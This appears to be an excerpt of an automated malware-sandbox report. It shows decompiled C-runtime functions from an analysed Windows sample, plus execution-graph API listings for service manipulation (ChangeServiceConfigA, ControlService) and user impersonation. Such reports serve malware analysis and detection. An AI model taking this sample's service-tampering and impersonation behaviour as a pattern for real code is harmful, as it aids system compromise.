                                                                        													__eflags = _t53[0x1b] - 0xffffffff;
                                                                        													if(_t53[0x1b] != 0xffffffff) {
                                                                        														_t53[0x1a] = _t53[0x1a] + 1;
                                                                        														_t48 = _t48 - 1;
                                                                        														__eflags = _t53[0x1c];
                                                                        														_t53[0x1b] = 0xffffffff;
                                                                        														if(_t53[0x1c] != 0) {
                                                                        															_t53[0xe] = 1;
                                                                        														}
                                                                        													}
                                                                        													__eflags = _t48;
                                                                        													if(_t48 <= 0) {
                                                                        														goto L38;
                                                                        													} else {
                                                                        														while(1) {
                                                                        															_t35 = 0x4000;
                                                                        															__eflags = _t48 - 0x4000;
                                                                        															if(_t48 < 0x4000) {
                                                                        																_t35 = _t48;
                                                                        															}
                                                                        															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                        															_t55 = _t55 + 0xc;
                                                                        															__eflags = _t30;
                                                                        															if(_t30 <= 0) {
                                                                        																goto L39;
                                                                        															}
                                                                        															_t48 = _t48 - _t30;
                                                                        															__eflags = _t48;
                                                                        															if(_t48 > 0) {
                                                                        																continue;
                                                                        															} else {
                                                                        																goto L38;
                                                                        															}
                                                                        															goto L41;
                                                                        														}
                                                                        														goto L39;
                                                                        													}
                                                                        												} else {
                                                                        													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                        													_t55 = _t55 + 4;
                                                                        													_t53[0x12] = _t30;
                                                                        													__eflags = _t30;
                                                                        													if(_t30 == 0) {
                                                                        														goto L39;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_push(0);
                                                                        										_push(_t48);
                                                                        										_push(_t53[0x10]);
                                                                        										_t53[0x1b] = 0xffffffff;
                                                                        										_t53[1] = 0;
                                                                        										 *_t53 = _t53[0x11];
                                                                        										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 < 0) {
                                                                        											goto L39;
                                                                        										} else {
                                                                        											_t53[0x1a] = _t48;
                                                                        											_t53[0x19] = _t48;
                                                                        											return _t48;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								if(_t43 == 0) {
                                                                        									_t48 = _t48 - _t53[0x19];
                                                                        								}
                                                                        								if(_t48 < 0) {
                                                                        									L39:
                                                                        									_t32 = _t30 | 0xffffffff;
                                                                        									__eflags = _t32;
                                                                        									return _t32;
                                                                        								} else {
                                                                        									if(_t53[0x11] != 0) {
                                                                        										L11:
                                                                        										if(_t48 <= 0) {
                                                                        											L17:
                                                                        											return _t53[0x19];
                                                                        										} else {
                                                                        											while(1) {
                                                                        												_t39 = 0x4000;
                                                                        												if(_t48 < 0x4000) {
                                                                        													_t39 = _t48;
                                                                        												}
                                                                        												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                        												_t55 = _t55 + 0xc;
                                                                        												if(_t30 == 0) {
                                                                        													goto L39;
                                                                        												}
                                                                        												_t48 = _t48 - _t30;
                                                                        												if(_t48 > 0) {
                                                                        													continue;
                                                                        												} else {
                                                                        													goto L17;
                                                                        												}
                                                                        												goto L41;
                                                                        											}
                                                                        											goto L39;
                                                                        										}
                                                                        									} else {
                                                                        										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                        										_t57 = _t55 + 4;
                                                                        										_t53[0x11] = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											goto L39;
                                                                        										} else {
                                                                        											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                        											_t55 = _t57 + 0xc;
                                                                        											goto L11;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L41:
                                                                        			}




















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _fseek_malloc_memset
                                                                        • String ID:
                                                                        • API String ID: 208892515-0
                                                                        • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                        • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t61;
                                                                        				signed int _t63;
                                                                        				void* _t68;
                                                                        				signed int _t69;
                                                                        				signed int _t72;
                                                                        				signed int _t74;
                                                                        				signed int _t75;
                                                                        				signed int _t77;
                                                                        				signed int _t78;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t84;
                                                                        				signed int _t88;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t101;
                                                                        
                                                                        				_t90 = __edx;
                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t100 = _a16;
                                                                        					_t105 = _t100;
                                                                        					if(_t100 != 0) {
                                                                        						_t82 = _a4;
                                                                        						__eflags = _t82;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t63 = _t59 | 0xffffffff;
                                                                        						_t90 = _t63 % _a8;
                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                        						if(__eflags > 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t97 = _a8 * _a12;
                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                        						_v8 = _t82;
                                                                        						_v16 = _t97;
                                                                        						_t81 = _t97;
                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                        							_v12 = 0x1000;
                                                                        						} else {
                                                                        							_v12 =  *(_t100 + 0x18);
                                                                        						}
                                                                        						__eflags = _t97;
                                                                        						if(_t97 == 0) {
                                                                        							L32:
                                                                        							return _a12;
                                                                        						} else {
                                                                        							do {
                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                        								__eflags = _t84;
                                                                        								if(_t84 == 0) {
                                                                        									L18:
                                                                        									__eflags = _t81 - _v12;
                                                                        									if(_t81 < _v12) {
                                                                        										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                        										__eflags = _t68 - 0xffffffff;
                                                                        										if(_t68 == 0xffffffff) {
                                                                        											L34:
                                                                        											_t69 = _t97;
                                                                        											L35:
                                                                        											return (_t69 - _t81) / _a8;
                                                                        										}
                                                                        										_v8 = _v8 + 1;
                                                                        										_t72 =  *(_t100 + 0x18);
                                                                        										_t81 = _t81 - 1;
                                                                        										_v12 = _t72;
                                                                        										__eflags = _t72;
                                                                        										if(_t72 <= 0) {
                                                                        											_v12 = 1;
                                                                        										}
                                                                        										goto L31;
                                                                        									}
                                                                        									__eflags = _t84;
                                                                        									if(_t84 == 0) {
                                                                        										L21:
                                                                        										__eflags = _v12;
                                                                        										_t98 = _t81;
                                                                        										if(_v12 != 0) {
                                                                        											_t75 = _t81;
                                                                        											_t90 = _t75 % _v12;
                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                        											__eflags = _t98;
                                                                        										}
                                                                        										_push(_t98);
                                                                        										_push(_v8);
                                                                        										_push(E0040FA20(_t90, _t98, _t100));
                                                                        										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                        										_t101 = _t101 + 0xc;
                                                                        										__eflags = _t74 - 0xffffffff;
                                                                        										if(_t74 == 0xffffffff) {
                                                                        											L36:
                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                        											_t69 = _v16;
                                                                        											goto L35;
                                                                        										} else {
                                                                        											_t88 = _t98;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 <= _t98) {
                                                                        												_t88 = _t74;
                                                                        											}
                                                                        											_v8 = _v8 + _t88;
                                                                        											_t81 = _t81 - _t88;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 < _t98) {
                                                                        												goto L36;
                                                                        											} else {
                                                                        												L27:
                                                                        												_t97 = _v16;
                                                                        												goto L31;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t77 = E0040C1FB(_t100);
                                                                        									__eflags = _t77;
                                                                        									if(_t77 != 0) {
                                                                        										goto L34;
                                                                        									}
                                                                        									goto L21;
                                                                        								}
                                                                        								_t78 =  *(_t100 + 4);
                                                                        								__eflags = _t78;
                                                                        								if(__eflags == 0) {
                                                                        									goto L18;
                                                                        								}
                                                                        								if(__eflags < 0) {
                                                                        									_t48 = _t100 + 0xc;
                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                        									__eflags =  *_t48;
                                                                        									goto L34;
                                                                        								}
                                                                        								_t99 = _t81;
                                                                        								__eflags = _t81 - _t78;
                                                                        								if(_t81 >= _t78) {
                                                                        									_t99 = _t78;
                                                                        								}
                                                                        								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                        								 *_t100 =  *_t100 + _t99;
                                                                        								_t101 = _t101 + 0xc;
                                                                        								_t81 = _t81 - _t99;
                                                                        								_v8 = _v8 + _t99;
                                                                        								goto L27;
                                                                        								L31:
                                                                        								__eflags = _t81;
                                                                        							} while (_t81 != 0);
                                                                        							goto L32;
                                                                        						}
                                                                        					}
                                                                        					L3:
                                                                        					_t61 = E0040BFC1(_t105);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					 *_t61 = 0x16;
                                                                        					E0040E744(_t90, 0, _t100);
                                                                        					goto L4;
                                                                        				}
                                                                        			}






























                                                                        APIs
                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 3240763771-0
                                                                        • Opcode ID: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                        • Opcode Fuzzy Hash: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v8;
                                                                        				signed int _v12;
                                                                        				char _v20;
                                                                        				char _t43;
                                                                        				char _t46;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				int _t57;
                                                                        				int _t58;
                                                                        				signed short* _t59;
                                                                        				short* _t60;
                                                                        				int _t65;
                                                                        				char* _t72;
                                                                        
                                                                        				_t72 = _a8;
                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					if( *_t72 != 0) {
                                                                        						E0040EC86( &_v20, _a16);
                                                                        						_t43 = _v20;
                                                                        						__eflags =  *(_t43 + 0x14);
                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                        							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								__eflags = _a4;
                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                        								if(__eflags != 0) {
                                                                        									L10:
                                                                        									__eflags = _v8;
                                                                        									if(_v8 != 0) {
                                                                        										_t53 = _v12;
                                                                        										_t11 = _t53 + 0x70;
                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                        										__eflags =  *_t11;
                                                                        									}
                                                                        									return 1;
                                                                        								}
                                                                        								L21:
                                                                        								_t54 = E0040BFC1(__eflags);
                                                                        								 *_t54 = 0x2a;
                                                                        								__eflags = _v8;
                                                                        								if(_v8 != 0) {
                                                                        									_t54 = _v12;
                                                                        									_t33 = _t54 + 0x70;
                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                        									__eflags =  *_t33;
                                                                        								}
                                                                        								return _t54 | 0xffffffff;
                                                                        							}
                                                                        							_t56 = _v20;
                                                                        							_t65 =  *(_t56 + 0xac);
                                                                        							__eflags = _t65 - 1;
                                                                        							if(_t65 <= 1) {
                                                                        								L17:
                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                        								if(__eflags < 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								__eflags = _t72[1];
                                                                        								if(__eflags == 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								L19:
                                                                        								_t57 =  *(_t56 + 0xac);
                                                                        								__eflags = _v8;
                                                                        								if(_v8 == 0) {
                                                                        									return _t57;
                                                                        								}
                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                        								return _t57;
                                                                        							}
                                                                        							__eflags = _a12 - _t65;
                                                                        							if(_a12 < _t65) {
                                                                        								goto L17;
                                                                        							}
                                                                        							__eflags = _a4;
                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                        							__eflags = _t58;
                                                                        							_t56 = _v20;
                                                                        							if(_t58 != 0) {
                                                                        								goto L19;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        						_t59 = _a4;
                                                                        						__eflags = _t59;
                                                                        						if(_t59 != 0) {
                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						_t60 = _a4;
                                                                        						if(_t60 != 0) {
                                                                        							 *_t60 = 0;
                                                                        						}
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                        				intOrPtr _t25;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				_t25 = _a16;
                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                        					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t34 = _t25 - 0x66;
                                                                        					if(_t25 != 0x66) {
                                                                        						__eflags = _t25 - 0x61;
                                                                        						if(_t25 == 0x61) {
                                                                        							L7:
                                                                        							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        						} else {
                                                                        							__eflags = _t25 - 0x41;
                                                                        							if(__eflags == 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        							}
                                                                        						}
                                                                        						L9:
                                                                        						return _t26;
                                                                        					} else {
                                                                        						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                        					}
                                                                        				}
                                                                        			}







                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:31.8%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:25
                                                                        Total number of Limit Nodes:0


                                                                        Control-flow Graph

                                                                        [Control-flow graph for the function at 7ffdc2eb0182; graph nodes reference ControlService, ChangeServiceConfigA and a call to 7ffdc2eb2049]
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: Service$ChangeConfigControl
                                                                        • String ID:
                                                                        • API String ID: 1778205439-0
                                                                        • Opcode ID: 453a6d13ce2e9233cb4bcaf714cf6e9be1dbe184984aae6c00e23145ac576d60
                                                                        • Instruction ID: af0a15e73bd54823b2b7ed48a40b9a8b4033cbeed52ba271f910e896d8520d31
                                                                        • Opcode Fuzzy Hash: 453a6d13ce2e9233cb4bcaf714cf6e9be1dbe184984aae6c00e23145ac576d60
                                                                        • Instruction Fuzzy Hash: E812A230A18A4D4FEB68DF2CDC567F977D0FB58311F10426EE84EC7291DA75A5818B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        [Control-flow graph for the function at 7ffdc2eb1a3c; graph nodes reference ControlService, ChangeServiceConfigA and a call to 7ffdc2eb2049]
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: Service$ChangeConfigControl
                                                                        • String ID:
                                                                        • API String ID: 1778205439-0
                                                                        • Opcode ID: 4fc1805c74cf3c8e697d6d849a96eff937959df1936bbadebca52d8a5b0337b7
                                                                        • Instruction ID: 3e077b4685b4910094fd7d2adb799c403f09252d6b049785d485f2591ef3e0a2
                                                                        • Opcode Fuzzy Hash: 4fc1805c74cf3c8e697d6d849a96eff937959df1936bbadebca52d8a5b0337b7
                                                                        • Instruction Fuzzy Hash: 4D12A230A18A4D4FEB68DF2CDC567F977D0FB58311F10426EE84EC7291DA75A9818B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph node and edge data omitted. API calls named in the graph: OpenSCManagerW, OpenServiceA
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: Open$ManagerService
                                                                        • String ID:
                                                                        • API String ID: 2351955762-0
                                                                        • Opcode ID: e7d33875a8d63c7287acc8c0c36493c3ec10362a497c35d857f0ed22203a75c4
                                                                        • Instruction ID: f6462c64d29c846edbf7a97c385473c8b6a235589b8649794ee5728a46024ea4
                                                                        • Opcode Fuzzy Hash: e7d33875a8d63c7287acc8c0c36493c3ec10362a497c35d857f0ed22203a75c4
                                                                        • Instruction Fuzzy Hash: 4EA1B030908A4C8FEB68EF68DC567F97BE1FB59311F00412EE44ED3292DE75A8458B85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph node and edge data omitted. API calls named in the graph: ChangeServiceConfigA
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeConfigService
                                                                        • String ID:
                                                                        • API String ID: 3849694230-0
                                                                        • Opcode ID: 198aba9ddb11a97f3dd07a2682cf2eab96d5d68bdf3199b6aa90596190c77c9f
                                                                        • Instruction ID: 68f184211af7f19bac9c7cee3ccf6a5a243c78b39b0dbedf5017e2cccfbd4154
                                                                        • Opcode Fuzzy Hash: 198aba9ddb11a97f3dd07a2682cf2eab96d5d68bdf3199b6aa90596190c77c9f
                                                                        • Instruction Fuzzy Hash: E3F19130A18A4D4FEB68DE2CDC567F977D0FB58311F10426EE84EC7291DAB5A5818BC2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 366e3c0db6644f9a59a63b6c8e3f03c36e57a0aa3fc076e6a23fd3e5c869672e
                                                                        • Instruction ID: 83373483f94253e9264abb20d5132d2bea2cb9165c85edb38f399886146d59b0
                                                                        • Opcode Fuzzy Hash: 366e3c0db6644f9a59a63b6c8e3f03c36e57a0aa3fc076e6a23fd3e5c869672e
                                                                        • Instruction Fuzzy Hash: D7916D30A08A4D8FEB68EF28C8557E977A1FF59311F00417EE84EC7291DF75A9818B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph node and edge data omitted. API calls named in the graph: OpenServiceA
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 50bbc8a79c4872553e6ca9fb3b471d999459bbe7e6995dc55c161e9fc7d9953b
                                                                        • Instruction ID: 45be1c63f25281d41af6d69ee9e2b7c5ab04d128957a55a83a8048180b99503d
                                                                        • Opcode Fuzzy Hash: 50bbc8a79c4872553e6ca9fb3b471d999459bbe7e6995dc55c161e9fc7d9953b
                                                                        • Instruction Fuzzy Hash: 97515030618A4D4FEB58EF28D8567B937E5FB59311F10412EE84EC3291DE75E8418B85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 34183e89955ef58204243979129bed3d8ddfa4bd4a7c1922377db50133a27393
                                                                        • Instruction ID: a7bb26fe808254a8673e2eb37f377588617d770f79465b87a876cf93dfff6555
                                                                        • Opcode Fuzzy Hash: 34183e89955ef58204243979129bed3d8ddfa4bd4a7c1922377db50133a27393
                                                                        • Instruction Fuzzy Hash: F251F331A0CA4D4FEB48EF68DC556B9B7E5FF99321F00017ED04DD32A2DEA968418791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 1c25384546163589a701c9bf984bbf82b795ce0cb72803502badab97a095a767
                                                                        • Instruction ID: 04f765fa9815880a778a17d894de1e40ddf9cc8bc143281d7538fa8b99eecfe3
                                                                        • Opcode Fuzzy Hash: 1c25384546163589a701c9bf984bbf82b795ce0cb72803502badab97a095a767
                                                                        • Instruction Fuzzy Hash: AD51F231A0CA494FEB48EF68CC556B9B7E5FF99321F00017ED04DD32A2DEB968058791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph node and edge data omitted. API calls named in the graph: FindCloseChangeNotification
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
